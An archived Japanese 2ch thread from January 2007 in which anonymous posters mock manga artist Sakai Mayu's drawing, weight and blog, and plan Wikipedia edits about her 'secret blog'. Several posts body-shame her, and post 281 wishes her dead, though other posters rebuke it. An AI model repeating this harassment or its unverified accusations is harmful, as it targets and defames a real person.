172 :花と名無しさん:2007/01/13(土) 02:13:15 ID:NYSrDcmbO
まゆぽ〜ん昨日レンジでからあげ作ったらカリカリサクサクして美味だったよ。胡麻油とにんにくとしょうゆとからあげスパイスと黒胡椒だよ。あと自家製ホウレン草とイモのオムレツ作ったお。

173 :花と名無しさん:2007/01/13(土) 02:19:44 ID:NYSrDcmbO
ケンタッチーのやきおにぎりだけがたべたいお おにぎりのみで売ってくれないかお レタス玉にシーザーサラダドレッシングかけてまるかじりたいお わかめごはんお

174 :花と名無しさん:2007/01/13(土) 10:53:38 ID:l5e2Fe5P0
キモイ

175 :花と名無しさん:2007/01/13(土) 11:03:33 ID:???O
ぽそらー?いるかお?(´;ω;`)

176 :花と名無しさん:2007/01/13(土) 11:59:17 ID:???0
>>169の痕跡

【ぽそりぽそられ】酒井まゆ9【ぽそられる】
http://comic6.2ch.net/test/read.cgi/gcomic/1156250125/43


43 花と名無しさん sage 2006/08/22(火) 22:23:30 ID:???0
シャワートイレ板からきました( ^ω^)


伝説のハセキョーきっぺーセックルシーンの戦争ドラマが放送された日でしたお(^ω^)

177 :花と名無しさん:2007/01/13(土) 12:07:08 ID:NYSrDcmbO
裏ブログの事実を風化させるなおまいら

178 :花と名無しさん:2007/01/13(土) 13:05:33 ID:???O
まとめサイトもあるし簡単に風化する訳無いお(^ω^)
それにここの住人なら忘れないお(^ω^)

179 :花と名無しさん:2007/01/13(土) 13:37:57 ID:???O
武内もそいや、裏ブログみたいなのあるんだよね
一般公開の武内○○○とゆかいな仲間たち以外に
ま、武内さんは、しっかりカギかけてるし、タイトルも分かりづらいから見付かることはないだろうが、最初に書かれてる毒捨てってのが怖い

180 :花と名無しさん:2007/01/13(土) 13:38:41 ID:???0
糞ビッチどもの巣を上げてやるぜ!

181 :花と名無しさん:2007/01/13(土) 15:24:40 ID:???O
ぽそらーになった記念にブコフでロキヘボ1巻買ってきたお(^ω^)
体がいろいろ有り得ない人間がいっぱいいたお!
目の描き方もナチと槇を足して3で割ったような感じだったお(^^ω)
パクってもオリジナル2人の足元にも及ばないぽそワロスm9(^ω^)

182 :花と名無しさん:2007/01/13(土) 15:34:23 ID:???0
誰かぽそらーのコミュニティサイトつくってくれお
2ch閉鎖後が寂しすぎるお(´;ω;`)


183 :花と名無しさん:2007/01/13(土) 15:57:14 ID:???O
今から閉鎖後の事考えるお(^ω^)
閉鎖されなくても無駄にはならないお(^ω^)
mixi以外でいいのあるかお?

184 :花と名無しさん:2007/01/13(土) 18:02:13 ID:???0
ザビビの随筆機能使ったらどうかお?(^ω^)

日記形式でぽそについて語ればいいお!

185 :花と名無しさん:2007/01/13(土) 18:07:42 ID:???O
ライブドアブログにて、まゆぽそブログ作ったよ 明日からオープンだお(^ω^)

186 :花と名無しさん:2007/01/13(土) 20:39:48 ID:???O
>>185
ブログについてkwsk!(^ω^)

187 :花と名無しさん:2007/01/13(土) 21:13:03 ID:???O
>>185
ブログURL載せてお(^ω^)
おまいさんが作ったんだおね?

188 :花と名無しさん:2007/01/14(日) 01:41:47 ID:???O
またすぐに消すとか無しでよろおね(^ω^)
何で明日公開なのか分からないお(^ω^)URL貼れないのは何故だお?

189 :花と名無しさん:2007/01/14(日) 12:41:30 ID:???O
ブログ期待age(^ω^)

190 :花と名無しさん:2007/01/14(日) 17:35:52 ID:???O
どうしようかお(;^ω^)

191 :花と名無しさん:2007/01/14(日) 17:50:38 ID:???O
>>190
どうしたんだお?

192 :ハフハフ:2007/01/14(日) 20:18:20 ID:???O
アセアセ(゚ω゚;)
ハフハフ(*^ω^*)

ワイはもっと皆とぽそりたかったお( ^ω^)/

もし閉鎖が嘘だったらこれからもよろしき(´ω`)

193 :花と名無しさん:2007/01/14(日) 20:20:54 ID:???O
>>191
いや…ぽそブログ作ったというぽそらーが反応ないから、どうしたもんかと(;^ω^)
他の案練ったほうがいいのかお?

194 :花と名無しさん:2007/01/14(日) 20:28:21 ID:???O
>>192
それでぽそらーのつもりか?出直してこい(^ω^)ここに来るな

195 :花と名無しさん:2007/01/14(日) 21:57:51 ID:???O
もうすぐお別れなんかお?

196 :花と名無しさん:2007/01/14(日) 23:08:35 ID:???O
差しおさえまで後52分かお?
>>194なにイライラしてるんだお(^ω^;;)
カルシウム食え。
つカルシウム

197 :花と名無しさん:2007/01/14(日) 23:15:09 ID:???O
もし本当に閉鎖なるとしたら心残りだからいっておくお(^ω^)
ぽそらーのみんなありがとう!おまいらのことは忘れないお!
最後に晒しageしとくお。ぽその裏ブログが風化しませんように。

198 :花と名無しさん:2007/01/14(日) 23:42:20 ID:???O
>>194誰がお前の言うことなんか聞くか(^ω^)ワイはぽそらーじゃないお( ^^ω)来るなとか偉そうにするなガキは黙ってろ(ω^^)お前が消えろ馬鹿ガッ(≧ω≦)

早起き
くそして
死にかけ
ねこに噛まれて
1月
9日
4649

おこるばか
((((((((^ω^)

199 :花と名無しさん:2007/01/15(月) 01:55:41 ID:???O
>>198 まゆぽそおつだお(^ω^)

200 :花と名無しさん:2007/01/15(月) 02:13:27 ID:???O
200?(^ω^)

まともなぽそらー愛してるお(^ω^)

201 :花と名無しさん:2007/01/15(月) 02:42:34 ID:???O
>>198
ぽそらーじゃないなら何でこのスレにいるの?
こんな所で油売ってないで
ちゃんと働くなり勉強するなりしなさい。
んー、もしかしてニート?

202 :花と名無しさん:2007/01/15(月) 03:33:38 ID:???O
>>198はいはいおうちに帰りましょうねー(^ω^)明日は学校でしょ?もう来ないでね。

↓これ以降>>198スルー進行でいくお(^ω^)
>>200ワイも愛してるお(^^ω)

203 :花と名無しさん:2007/01/15(月) 03:57:28 ID:???O
いじめ楽しいお(^ω^)

204 :花と名無しさん:2007/01/15(月) 03:59:20 ID:???O
スルーできなくてごめんお(^ω^;)

反省終わり!!(笑)

205 :花と名無しさん:2007/01/15(月) 03:59:28 ID:???O
ぽそに彼氏はいるのかお?(^ ω ^ )

206 :花と名無しさん:2007/01/15(月) 04:04:34 ID:???O
みんなまゆぽそそっくりだおね(-^ω^-)

齒時眼邇鴕陏頤沱篦袙安良田梛惡(^ω^ )

惡間衞鑼端役鰤涅飫!


207 :花と名無しさん:2007/01/15(月) 04:08:32 ID:???O
中傷、叩き行為等は禁止です。もし発見した場合は予告無しに即、削除致しますので御了承下さい。

208 :花と名無しさん:2007/01/15(月) 04:09:36 ID:???O
何?こいつら


( ´д)ヒソヒソ(д` )

209 :花と名無しさん:2007/01/15(月) 11:01:23 ID:???O
朝方まで自演乙

210 :花と名無しさん:2007/01/15(月) 13:03:10 ID:???O
ありがとう

211 :花と名無しさん:2007/01/15(月) 13:40:22 ID:???0
嵐も禁止だろ

212 :花と名無しさん:2007/01/15(月) 13:48:17 ID:???O
まゆぽ(^ω^)

213 :花と名無しさん:2007/01/15(月) 15:34:54 ID:???O
>>212
馬鹿ガッ(^^ω)

214 :花と名無しさん:2007/01/15(月) 15:49:26 ID:???O
ぽそブログ更新しておっ

215 :花と名無しさん:2007/01/15(月) 23:06:31 ID:???O
ぽそ最近怠けすぎだお
( ^ ω ^ )

216 :花と名無しさん:2007/01/16(火) 00:26:53 ID:???O
ぽそ〜?
生きてるかお(? ω ? )

217 :花と名無しさん:2007/01/16(火) 00:37:31 ID:???O
半角の?って目立つな

218 :花と名無しさん:2007/01/16(火) 02:46:30 ID:fMlMDbKkO
まゆぽそ=主人公にあてはめたら爆笑できるドリームな内容といいどこの厨2?

219 :花と名無しさん:2007/01/16(火) 02:50:24 ID:fMlMDbKkO
酒井の作風って北側みゆき愛読してそう。次の漫画には男子部のマネージャーでてきそう。酒井切ってオバナ使えばいいのに

220 :花と名無しさん:2007/01/16(火) 14:59:07 ID:VZkoG4ER0
酒井うざい。こわいものしらずなんじゃね?
表ブログなにあれ。クチのききかたしらない大人だね。
調子ぶっこいてんじゃねよ。デブース。
早くりぼんから消えて欲しい。このデブスの漫画よんでないし。

221 :花と名無しさん:2007/01/16(火) 15:26:18 ID:???0
http://www.37vote.net/comic/1155448266/
酒井まゆに投票しちゃった。

222 :花と名無しさん:2007/01/16(火) 15:35:30 ID:???0
リアはうざいお

223 :花と名無しさん:2007/01/16(火) 16:03:01 ID:???0
なんかもう酒井の漫画下手くそすぎて突っ込むのもめんどくさい

男はかっこよさの欠片もないオカマ
女は出目金 まつげ内側から生えてる化け物

展開も『あー…』て感想しか出てこないし

マジいらなくね?

224 :花と名無しさん:2007/01/16(火) 16:56:12 ID:???O
最近荒れてるおね

225 :花と名無しさん:2007/01/16(火) 20:04:30 ID:???O
m6( ^   ω   ^ )

226 :花と名無しさん:2007/01/16(火) 20:35:01 ID:???O
>>225まゆぽそついにそこまで太ったかお(^ω^;;)

227 :花と名無しさん:2007/01/16(火) 23:33:11 ID:np74eKnq0
まゆぽそきもい

228 :花と名無しさん:2007/01/17(水) 00:00:53 ID:???O
厨でもいいからsageようぜ(^ω^)バーロー

229 :花と名無しさん:2007/01/17(水) 01:25:12 ID:???0


230 :花と名無しさん:2007/01/17(水) 06:21:10 ID:11hYb/W90
あげ

231 :花と名無しさん:2007/01/18(木) 11:11:16 ID:???O
しかも…だお(^ω^)

232 :花と名無しさん:2007/01/18(木) 11:30:47 ID:???O
何でブログ連投?(^ω^)

233 :花と名無しさん:2007/01/18(木) 14:27:18 ID:???O
まゆぽそ壊れた?もしくはここ数日で更新の仕方わすれた?(^ω^)

234 :花と名無しさん:2007/01/18(木) 15:21:43 ID:???O
まゆぽそ「来月にロキヘボ3巻が発売するから、お年玉とっとけお馬鹿が(^ω^)」

235 :花と名無しさん:2007/01/18(木) 17:25:24 ID:???O
…(´ω`)

236 :花と名無しさん:2007/01/18(木) 17:47:07 ID:???0
まゆぽそ糞笑えるw

237 :花と名無しさん:2007/01/18(木) 17:50:13 ID:???O
お年玉もう使った(^ω^)
まゆぽそ、残念!!

238 :花と名無しさん:2007/01/18(木) 17:59:35 ID:???O
てか今酒井まゆは倉橋化している 面白くないんだけど何故か連載できる漫画。描いてる物はほぼナチと一緒なんだけど(ヒロインと男をイチャイチャさせる→キスシーン)誰とくっつこうがラブラブしようが主人公に魅力の欠片もない

239 :花と名無しさん:2007/01/19(金) 01:13:31 ID:???O
二回言うことでロキヘボ買えよってのを強調したんだろうか(^ω^)

240 :花と名無しさん:2007/01/19(金) 08:45:17 ID:???O
まぁそういうことだから、よろしこ!!m9(^ω^)

241 :花と名無しさん:2007/01/19(金) 13:31:09 ID:???O
買わない(^ω^)買わない(^ω^)買わな い?(^ω^)買う(゜∀゜)

242 :花と名無しさん:2007/01/19(金) 13:55:03 ID:???O
>>241
結局買うのかおwwwワロス(^ω^)
まぁ柱とかは気になるおな(^^^^ω)

243 :花と名無しさん:2007/01/19(金) 14:26:38 ID:???O
おっおっおっ(;^ω^≡^ω^;)゙

244 :花と名無しさん:2007/01/19(金) 17:41:48 ID:???0
>>238
倉橋は面白いだろ、ネタとして

245 :花と名無しさん:2007/01/19(金) 19:06:31 ID:???O
柱期待しちゃうが二巻も普通だったしな
裏の事書けよ。

246 :花と名無しさん:2007/01/20(土) 11:48:26 ID:???O
(´;ω;`)過疎
ぽそらー戻ってきてお

247 :花と名無しさん:2007/01/20(土) 12:26:45 ID:???O
柱、永田町苺の一巻は痛かったようなきがしる捨てちゃったからUPできない 苺の頃は黒目が細かったよね、ナチの真似して黒目だけ肥大させたからキンモくて直視できん 睫毛も露骨だよナチ意識してる事 髪も苺はもっとスットントンだったし

248 :花と名無しさん:2007/01/21(日) 11:54:42 ID:???O
サーバー落ちから復帰かお??(^ω^)
まゆぽそ更新…写真ステッカーの載せるベ、普通。
予想の斜め上(けなし)をいくまゆぽそ最高!(^ω^)

249 :花と名無しさん:2007/01/21(日) 12:02:56 ID:???0
今更だけどぬるまゆをお気に入りから追放したお
飽きたから
でもこのスレはこれからも覗きにくるお(^ω^)

250 : ◆S.MAYUa8v2 :2007/01/21(日) 15:07:44 ID:???0
250ならまゆは俺の嫁

251 :花と名無しさん:2007/01/21(日) 16:06:11 ID:???O
キモいお( ω )^ ^

252 :花と名無しさん:2007/01/21(日) 17:37:18 ID:???O
250は奇特な方でつね(^ω^)

253 :花と名無しさん:2007/01/21(日) 18:43:23 ID:???O
やっと見れたおー
ぬるまゆ最新記事が凄く不快だお(^ω^)

ところで、ウィキの記事はあれでいいのかお?裏ブログの事を詳細に書きすぎるのもアレだが。
少しはしょりすぎじゃ?

254 :花と名無しさん:2007/01/22(月) 06:11:21 ID:???0
>>253
wiki今見てきたお!(^ω^)
裏ブログの事がたった一文に編集されていたお!(^ω^)
編集した人の「裏ブログの件は外部まとめサイトもあることですし〜」って
wikiにそのサイトのリンク貼ってないなら関係ないんじゃないのかお?

255 :花と名無しさん:2007/01/22(月) 09:49:31 ID:???O
wikiにまとめサイト追加する?それとも編集しなおす?
まゆぽそスレテンプレ集だったっけ?
あの人はまた難癖つけて消してきそうだけど。
あのままでいいとは思わない…

256 :花と名無しさん:2007/01/22(月) 12:31:03 ID:???O
追加くらいで良くない?
戻されるような気はするけど…(^ω^);

257 :花と名無しさん:2007/01/22(月) 12:35:17 ID:???0
裏ブログのことを戻してリンク先にまとめサイト追加でおk?
あいつはまゆぽそなのかお?どうせ戻すに決まってるお!(^^ω)
何回か消したり追加したりってことになりそうだお・・・

258 :花と名無しさん:2007/01/22(月) 13:17:20 ID:???O
意見を聞きたいからあげ


個人的にはそれでいいお
(^ω^)

259 :花と名無しさん:2007/01/22(月) 15:12:34 ID:???O
それでもいいから真実を書いた方がいいと思うお(^^ω)

260 :花と名無しさん:2007/01/22(月) 16:34:48 ID:???0
わたしがまゆぽそだったらウィキを毎日更新する。

261 :花と名無しさん:2007/01/22(月) 16:59:14 ID:???O
自分がぽそならデッサンの練習するお(^ω^)


ウィキ編集できる人頼むお(^ω^)

262 :花と名無しさん:2007/01/22(月) 17:21:09 ID:???0
おいPOSO。同人サイトのネットサーフィンしてるひまに
なんでデッサンの練習とか単行本化にあたって
直しとかしないの??文句ばっかたれてて、
いい漫画をお届けしようというやるきはあるんですか?
苦情に文句たれる前に自分はデッサンとか
「漫画家歴 かさねるにるれ面白い漫画」描こうとかいう努力してるんですか?
クラハシみたいな老害になるならまゆぽんいらないんですけど。

263 :花と名無しさん:2007/01/22(月) 17:23:45 ID:???0
かさねるにつれ↑

それとも自分の漫画のよさがわからない奴はオレの漫画よむな!
ですか?
そんなこっちゃからまゆぽそはいつまでもまゆぽそ、
ロキヘボはロキヘボ、へっぽこ漫画家はへっぽこ漫画家なんだよ
そのへっぽこを脱っする努力はしてるんですか?

264 :花と名無しさん:2007/01/22(月) 17:27:01 ID:???0
作品も未熟だが人間も未熟だと話にならん。


265 :花と名無しさん:2007/01/22(月) 18:25:58 ID:???O
まぁ頑張ってね、まゆぽそ(^ω^)

266 :花と名無しさん:2007/01/22(月) 19:16:18 ID:???O
wiki(^ω^)どうするお

267 :花と名無しさん:2007/01/22(月) 21:03:59 ID:5E5K2J+M0
まゆぽそ消えろ

268 :花と名無しさん:2007/01/22(月) 21:13:28 ID:???0
漫画はぽその自己満足だもんね。
だからあんな何も伝わらない漫画なんだよ
本人の意識がかわらにゃ一生あのまんま。
性格もね。

269 :花と名無しさん:2007/01/22(月) 21:32:08 ID:???0
ヒロイソに彼氏もできた今これ以上何を描くというのだろう

270 :花と名無しさん:2007/01/22(月) 22:34:33 ID:???0
>>257
自分も最初、編集したのはまゆぽそ本人かと思ったお!(^ω^)

wikiを編集できるぽそらーの人!前に戻したり、リンク追加したり
してくれて構わないお!(^ω^)

271 :花と名無しさん:2007/01/22(月) 22:50:13 ID:???O
ウィキ編集したことないから怖いお(^ω^)
ぽそらーお願いしますお(^ω^;)
あの人はぽそファンなのかお?中立的な観点で見てもまとめをリンクにいれるくらいはすると思うお
隠しても隠さなくても裏ブログで検索されるだろうけど隠蔽体質いくないお(^ω^)w

272 :花と名無しさん:2007/01/22(月) 22:59:34 ID:gbKzhG8rO
269ナチ型で最初から容姿に恵まれたヒロインで彼氏もピーチガールみたいに障害なくでき、これ以上ヒロインのノロケストーリーをダラダラ書き続けるつもりなんだろうか 意外性も予想外も糞もない漫画だ モッチーみたいな結婚オチに3000ぽそ

273 :花と名無しさん:2007/01/22(月) 23:03:43 ID:gbKzhG8rO
ピーチガールみたいな恋敵や障害もなく、の間違いゴメン。テニプリはあるイミ、意外性満載。テニス(中学生)のスマッシュぐらいで幽白みたいに観客席にふっとんでたジャンプで。またビリヤードかいてよまゆぽそ

274 :花と名無しさん:2007/01/22(月) 23:08:22 ID:gbKzhG8rO
なんかまゆぽそテニス漫画とかチアリダ漫画とかそのうち書きそう。りぼん編集はスポ魂漫画とかもバランスよくいれればいいのに、虫けらほどの知能もない。←ヂョバナン王子追放

275 :花と名無しさん:2007/01/23(火) 02:27:41 ID:???0
>>272-274
お前も十分痛々しいぞ

276 :花と名無しさん:2007/01/23(火) 13:14:14 ID:???O
>>275
代弁してくれてありがとうだお(^ω^)

277 :花と名無しさん:2007/01/23(火) 18:51:08 ID:???0
wiki編集するとか貧相なプライドだなまゆぽそ。
今更隠そうとするなよ
そのプライドを漫画に向けろ

278 :花と名無しさん:2007/01/23(火) 19:23:38 ID:???0
吉井凛 トレースパクリ クッキー集英社より
http://p.pita.st/?m=hmbvestv
↓左、ロゴにあわせたほうに注目
http://p.pita.st/?1zaxc8e6
606 :花と名無しさん :2007/01/23(火) 18:04:22 ID:???0
>>594
一枚目の奴、ロゴが!!! ロゴがそのまんまや〜〜〜!!!
こりゃ言い訳できんね。

279 :花と名無しさん:2007/01/23(火) 19:54:01 ID:???0
コピペ貼りまくりは萎える

280 :花と名無しさん:2007/01/23(火) 23:35:14 ID:CK1E3Zv/0
ブログもあいかわらずきもいな

281 :花と名無しさん:2007/01/24(水) 00:05:28 ID:???0
まゆぽそが殺人事件に巻き込まれたらいいのに。
被害にあう人って結構まっすぐな人ばっかりだ。

ねーねーどうしてぽそが生きてるの?
はっきり言ってぽそには価値のかけらもないよ。
もうちょっと真面目に生きろや糞が

282 :花と名無しさん:2007/01/24(水) 00:17:21 ID:???0
>>281
いいすぎだお
まゆぽそなりに一生懸命生きてるお(^ω^)
裏ブログ発覚を機に更生してほしいお(^ω^)まゆぽそ

ウィキ更新age

283 :花と名無しさん:2007/01/24(水) 00:19:38 ID:???0
>>281
調子にのって異常なこと書くなヴォケ

284 :花と名無しさん:2007/01/24(水) 00:28:31 ID:???0
>>281
人間、言っていいことと悪いことがあるお(^ω^)
その区別もつかない馬鹿に他人の価値を決める権利なんて無いお

285 :花と名無しさん:2007/01/24(水) 00:30:12 ID:???0
>>281
ぎゃーあんた最低。
何書いてもいいなんて勘違いすんなよ。

286 :花と名無しさん:2007/01/24(水) 00:33:36 ID:???0
まゆぽそのサイン会や春田ななが読者プレゼントの目覚まし時計に自身の声を録音させられた
(声優じゃねーぞ!)話を聞いて漫画かも大変だと思ったお(^ω^;)
漫画だけ描いてればいいってもんじゃないし(^ω^)

だからと言ってまゆぽその裏ブログはちとストレス発散しすぎだお(^ω^)

287 :花と名無しさん:2007/01/24(水) 00:36:34 ID:???0
なんだこの流れは!みんな優しいお(^ω^)
確かにまゆぽそは殺されるほど悪いことはしてないと思うお(^^ω)
社会人としては失格だとは思うが(^ω^)
まゆぽその今後をみんなで生温かく見守るお(^ω^)

288 :花と名無しさん:2007/01/24(水) 01:30:23 ID:???0
>>281
まゆぽそと同レベルだお^^ω
いや、お前の方が言い過ぎだな
イライラしてるからって自分を見失っちゃいかん^^ω

289 :花と名無しさん:2007/01/24(水) 01:50:22 ID:???O
ジャガイモとこぶ茶

まゆぽそのお手手
(^0ω0^)

290 :花と名無しさん:2007/01/24(水) 02:00:31 ID:???O
ぽそらー大好きだお(^ω^)分別つけられるところも大好きだお(^ω^)

ウィキ更新されたんお?(^ω^)

291 :花と名無しさん:2007/01/24(水) 02:25:55 ID:???0
コミック読んで面白かったから、
世間での評判がどんなものか「ロッキンヘブン」でググったが、あまり記事がヒットしなかったので、
2ちゃんにスレがないか来てみたら・・・('A`)

スレは立ってたけど、見たくも無い評判だったわwww
2ちゃんで少女漫画の感想なんざ見るもんじゃねーなwww

つーか画力がねーってスレまで立ってるしwww
確かにあごの輪郭とかちょいアレだなぁ、と思うけど1月号の表紙とか可愛かったのにな。
コミックの柱で印刷できれいに出たとか出なかったとか書いてるのも見たけど、
そんな「文句」なんていうほど悪態ついてるようにも見えなかったがなぁ…(;´ー`)

まぁ、ちゃんねるの空気なんてそんなもんか。
普段こっちの板来ること無いからちょっと夢を持ってたみたいだよ('A`)



こないだ2巻・・・、そう、りぼんの1月号と一緒に買ったから去年の12月か、に買ったと思ったのに、
ググったらもう3巻も出てるんだな、速いな。


あーもう、俺は面白く漫画が読めたらいいんだからよ、漫画家の精神攻撃するようなのやめてくれって思うんだけどな。
これで精神病んで欝なこと描かれたらナッカリ('A`) だし。
やっぱアレか、女ってそういうとこねちぃのか。
じゃあ、作者もそんなの慣れっこだよな。
自己完結失礼。




見に来なきゃよかった('A`)

292 :花と名無しさん:2007/01/24(水) 02:36:05 ID:???O
じゃがいも(^ω^)

293 :花と名無しさん:2007/01/24(水) 02:41:08 ID:???0
逆境を乗り越えて連載好調のまゆぽそ大好きだお(^ω^)
自分がまいた種なのはスルーだお(^ω^)
逆境こそ楽しみなさいは名言だお(^ω^)

294 :花と名無しさん:2007/01/24(水) 04:25:07 ID:???0
>>291
>見に来なきゃよかった('A`)

まで読んだ

295 :花と名無しさん:2007/01/24(水) 04:28:58 ID:???0
>コミック読んで紗和の妹に勃
まで読んだ

296 :花と名無しさん:2007/01/24(水) 06:33:20 ID:???0
ここでの評判に糞ワロタ
何でも本人が痛ければ叩かれるの当たり前だからなあ
男性陣の顔をとりあえずなんとかするといいと思うよ

297 :花と名無しさん:2007/01/24(水) 08:07:36 ID:???O
ぽそスレはちょっと勢いつきすぎて一部の人が冷静さを欠いてる気がする。
裏ブログのこと、知った当時はちょっと衝撃だったけど、ここまで引っ張るほどのこと?
ネタ半分で話題が残ってるのはわかるけど、「風化させるな」なんて大げさだった。
ウィキだって、2ちゃんの便利なまとめサイトじゃなくて、ネット上の辞書なんだよ?
裏ブログのまとめはちゃんと別にあるんだし、おもしろ半分の記事編集はしなくていいんじゃないの。

298 :花と名無しさん:2007/01/24(水) 09:52:29 ID:???O
裏ブログも含めてまゆぽそ(^ω^)と認識しているお

299 :花と名無しさん:2007/01/24(水) 11:22:37 ID:???O
>297
あなた一人が喚いても無意味だし、手が疲れるだけだお(^ω^)
そんな事より楽しもうZE★

300 :花と名無しさん:2007/01/24(水) 11:26:58 ID:???O
ワイはこのまま居続けるお(^ω^)

301 :花と名無しさん:2007/01/24(水) 13:40:33 ID:???0
なんか最近厨が増えたな

302 :花と名無しさん:2007/01/24(水) 14:51:49 ID:???0
この厨ガッ(^ω^)
って思うことが時々あるね

303 :花と名無しさん:2007/01/24(水) 14:58:53 ID:???O
まぁ厨のおかげで楽しめることもあるし(^ω^)
自分は諦めるお

304 :花と名無しさん:2007/01/24(水) 16:03:30 ID:???O
辞書ってのは真実を載せるものだお(^ω^)
最低限のモラルを持って、過度の擁護も批判もせず
客観的な立場から見た真実を載せるべきだお(^ω^)
とりあえず現在のウィキは問題ないと思うお(^ω^)

ワイはこれからもこのスレで愉快なまゆぽそトークを楽しむお(^ω^)

305 :花と名無しさん:2007/01/24(水) 17:18:44 ID:???0
>>297
けっこう同意だお(^ω^)

306 :花と名無しさん:2007/01/24(水) 21:35:34 ID:???O
倉橋のかくカップルなみに興味わかない。いつも気の強め美少女設定ピロインで人間的魅力を感じない点まで同じ。テニプリでいうとリョーマみたいな労せずして天才型主人公て感じでつまらん。

307 :花と名無しさん:2007/01/24(水) 22:09:09 ID:???O
このスレでテニプリという言葉を使うのはいつもID丸出しで書き込んでる人だけだよね?

54 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)